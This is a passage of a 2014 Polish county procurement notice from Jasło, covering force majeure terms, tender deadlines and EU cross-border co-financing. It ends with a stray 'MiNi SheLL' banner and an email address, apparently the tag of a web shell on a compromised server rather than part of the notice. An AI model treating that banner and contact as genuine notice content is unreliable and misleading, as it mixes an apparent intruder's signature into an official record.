<p>1). Wystąpienia siły wyższej - tj. zdarzenia bądź połączenia zdarzeń obiektywnie niezależnych od Wykonawcy lub Zamawiającego, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których Wykonawca lub Zamawiający nie mogli przewidzieć i którym nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych (np. wojny, pożary, powodzie, embarga przewozowe, strajki oraz oficjalne decyzje organów władzy państwowej, huragany, itp.). Strona dotknięta działaniem siły wyższej jest zobowiązana do pisemnego powiadomienia o tym fakcie drugiej strony w ciągu 5 dni roboczych, pod rygorem braku możliwości powoływania się na klauzulę siły wyższej. Opóźnienia muszą być udokumentowane stosownymi protokołami podpisanymi przez Wykonawcę i Zamawiającego oraz zaakceptowane przez Zamawiającego. 
2). Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności skutkująca brakiem możliwości należytego wykonania umowy, w szczególności terminu realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.jaslo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Jaśle, Rynek 18, 38-200 Jasło, pok. 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 11:00, miejsce: Sekretariat Starosty pok. 314, Starostwo Powiatowe w Jaśle, Rynek 18, 38-200 Jasło.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska - Republika Słowacka 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com